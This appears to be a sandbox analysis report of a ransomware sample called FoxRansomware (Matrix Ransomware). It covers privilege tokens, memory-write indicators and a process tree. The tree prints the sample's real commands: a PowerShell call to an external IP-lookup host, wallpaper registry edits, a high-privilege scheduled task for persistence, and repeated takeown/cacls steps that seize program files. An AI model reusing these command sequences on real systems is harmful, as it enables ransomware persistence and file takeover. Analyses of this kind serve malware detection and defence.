Token: SeSystemtimePrivilege	1700	WMIC.exe
Token: SeProfSingleProcessPrivilege	1700	WMIC.exe
Token: SeIncBasePriorityPrivilege	1700	WMIC.exe
Token: SeCreatePagefilePrivilege	1700	WMIC.exe
Token: SeBackupPrivilege	1700	WMIC.exe
Token: SeRestorePrivilege	1700	WMIC.exe
Token: SeShutdownPrivilege	1700	WMIC.exe
Token: SeDebugPrivilege	1700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1700	WMIC.exe
Token: SeRemoteShutdownPrivilege	1700	WMIC.exe
Token: SeUndockPrivilege	1700	WMIC.exe
Token: SeManageVolumePrivilege	1700	WMIC.exe
Token: 33	1700	WMIC.exe
Token: 34	1700	WMIC.exe
Token: 35	1700	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1700	WMIC.exe
Token: SeSecurityPrivilege	1700	WMIC.exe
Token: SeTakeOwnershipPrivilege	1700	WMIC.exe
Token: SeLoadDriverPrivilege	1700	WMIC.exe
Token: SeSystemProfilePrivilege	1700	WMIC.exe
Token: SeSystemtimePrivilege	1700	WMIC.exe
Token: SeProfSingleProcessPrivilege	1700	WMIC.exe
Token: SeIncBasePriorityPrivilege	1700	WMIC.exe
Token: SeCreatePagefilePrivilege	1700	WMIC.exe
Token: SeBackupPrivilege	1700	WMIC.exe
Token: SeRestorePrivilege	1700	WMIC.exe
Token: SeShutdownPrivilege	1700	WMIC.exe
Token: SeDebugPrivilege	1700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1700	WMIC.exe
Token: SeRemoteShutdownPrivilege	1700	WMIC.exe
Token: SeUndockPrivilege	1700	WMIC.exe
Token: SeManageVolumePrivilege	1700	WMIC.exe
Token: 33	1700	WMIC.exe
Token: 34	1700	WMIC.exe
Token: 35	1700	WMIC.exe
Token: SeTakeOwnershipPrivilege	1396	takeown.exe
Token: SeTakeOwnershipPrivilege	2180	takeown.exe
Token: SeTakeOwnershipPrivilege	568	takeown.exe
Token: SeTakeOwnershipPrivilege	1668	takeown.exe
Token: SeTakeOwnershipPrivilege	4172	takeown.exe
Token: SeTakeOwnershipPrivilege	3912	takeown.exe
Token: SeTakeOwnershipPrivilege	3312	takeown.exe
Token: SeTakeOwnershipPrivilege	3060	takeown.exe
Token: SeTakeOwnershipPrivilege	4248	takeown.exe
Token: SeTakeOwnershipPrivilege	2288	takeown.exe
Token: SeTakeOwnershipPrivilege	4260	takeown.exe
Token: SeTakeOwnershipPrivilege	400	takeown.exe
Token: SeTakeOwnershipPrivilege	4308	takeown.exe
Token: SeTakeOwnershipPrivilege	1244	takeown.exe
Token: SeTakeOwnershipPrivilege	2492	takeown.exe
Token: SeTakeOwnershipPrivilege	352	takeown.exe
Token: SeTakeOwnershipPrivilege	4056	takeown.exe
Token: SeTakeOwnershipPrivilege	4164	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2908 wrote to memory of 2924	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	29
PID 2908 wrote to memory of 2924	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	29
PID 2908 wrote to memory of 2924	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	29
PID 2908 wrote to memory of 2924	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	29
PID 2908 wrote to memory of 2500	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	31
PID 2908 wrote to memory of 2500	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	31
PID 2908 wrote to memory of 2500	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	31
PID 2908 wrote to memory of 2500	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	31
PID 2908 wrote to memory of 1548	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	33
PID 2908 wrote to memory of 1548	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	33
PID 2908 wrote to memory of 1548	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	33
PID 2908 wrote to memory of 1548	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	33
PID 1548 wrote to memory of 1472	1548	cmd.exe	35
PID 1548 wrote to memory of 1472	1548	cmd.exe	35
PID 1548 wrote to memory of 1472	1548	cmd.exe	35
PID 1548 wrote to memory of 1472	1548	cmd.exe	35
PID 2908 wrote to memory of 112	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	36
PID 2908 wrote to memory of 112	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	36
PID 2908 wrote to memory of 112	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	36
PID 2908 wrote to memory of 112	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	36
PID 2908 wrote to memory of 400	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	37
PID 2908 wrote to memory of 400	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	37
PID 2908 wrote to memory of 400	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	37
PID 2908 wrote to memory of 400	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	37
PID 112 wrote to memory of 2160	112	cmd.exe	40
PID 112 wrote to memory of 2160	112	cmd.exe	40
PID 112 wrote to memory of 2160	112	cmd.exe	40
PID 112 wrote to memory of 2160	112	cmd.exe	40
PID 400 wrote to memory of 1096	400	cmd.exe	41
PID 400 wrote to memory of 1096	400	cmd.exe	41
PID 400 wrote to memory of 1096	400	cmd.exe	41
PID 400 wrote to memory of 1096	400	cmd.exe	41
PID 112 wrote to memory of 3040	112	cmd.exe	42
PID 112 wrote to memory of 3040	112	cmd.exe	42
PID 112 wrote to memory of 3040	112	cmd.exe	42
PID 112 wrote to memory of 3040	112	cmd.exe	42
PID 112 wrote to memory of 1996	112	cmd.exe	43
PID 112 wrote to memory of 1996	112	cmd.exe	43
PID 112 wrote to memory of 1996	112	cmd.exe	43
PID 112 wrote to memory of 1996	112	cmd.exe	43
PID 2908 wrote to memory of 2936	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	44
PID 2908 wrote to memory of 2936	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	44
PID 2908 wrote to memory of 2936	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	44
PID 2908 wrote to memory of 2936	2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe	44
PID 2936 wrote to memory of 3556	2936	cmd.exe	46
PID 2936 wrote to memory of 3556	2936	cmd.exe	46
PID 2936 wrote to memory of 3556	2936	cmd.exe	46
PID 2936 wrote to memory of 3556	2936	cmd.exe	46
PID 2936 wrote to memory of 2060	2936	cmd.exe	47
PID 2936 wrote to memory of 2060	2936	cmd.exe	47
PID 2936 wrote to memory of 2060	2936	cmd.exe	47
PID 2936 wrote to memory of 2060	2936	cmd.exe	47
PID 1096 wrote to memory of 3960	1096	wscript.exe	48
PID 1096 wrote to memory of 3960	1096	wscript.exe	48
PID 1096 wrote to memory of 3960	1096	wscript.exe	48
PID 1096 wrote to memory of 3960	1096	wscript.exe	48
PID 2936 wrote to memory of 3936	2936	cmd.exe	49
PID 2936 wrote to memory of 3936	2936	cmd.exe	49
PID 2936 wrote to memory of 3936	2936	cmd.exe	49
PID 2936 wrote to memory of 3936	2936	cmd.exe	49
PID 3960 wrote to memory of 3968	3960	cmd.exe	51
PID 3960 wrote to memory of 3968	3960	cmd.exe	51
PID 3960 wrote to memory of 3968	3960	cmd.exe	51
PID 3960 wrote to memory of 3968	3960	cmd.exe	51

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2908
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWK46EMN.exe"
  2⤵
  PID:2924
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWK46EMN.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWK46EMN.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2500
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\IxFf0Wdb.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1548
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1472
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\S65PBpRR.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:112
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\S65PBpRR.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2160
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Cj3neP5l.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Cj3neP5l.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1096
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\LztNhVrL.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3960
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\LztNhVrL.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:3968
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:4872
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:2640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "AdobeID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3936
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "AdobeID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4040
    - - C:\Users\Admin\AppData\Local\Temp\95Y5ZjHg64.exe
        
        95Y5ZjHg.exe -accepteula "AdobeID.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  PID:2084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Modifies file permissions
    PID:3120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3140
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:540
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Loads dropped DLL
  PID:3228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3164
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
  2⤵
  - Loads dropped DLL
  PID:3168
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
    3⤵
    PID:3264
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "SignHere.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2964
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "SignHere.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:2080
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3424
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
  2⤵
  - Loads dropped DLL
  PID:2956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
    3⤵
    PID:996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "Dynamic.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4168
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "Dynamic.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:4188
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Loads dropped DLL
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3380
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:4124
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Loads dropped DLL
  PID:3620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:3684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    PID:916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3976
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      PID:912
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
  2⤵
  - Loads dropped DLL
  PID:1620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3392
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:3720
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  - Loads dropped DLL
  PID:356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:4212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    - Modifies file permissions
    PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4244
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      Executes dropped EXE
      PID:4256
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4344
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  - Loads dropped DLL
  PID:4404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4380
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:4436
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  - Loads dropped DLL
  PID:4652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    PID:4524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "main.css" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4484
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "main.css" -nobanner
      4⤵
      Executes dropped EXE
      PID:3396
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  - Loads dropped DLL
  PID:4532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    - Modifies file permissions
    PID:400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4780
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:2148
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
  2⤵
  - Loads dropped DLL
  PID:4292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:4312
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:4320
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  - Loads dropped DLL
  PID:4460
- - C:\Windows\SysWOW64\cacls.exe
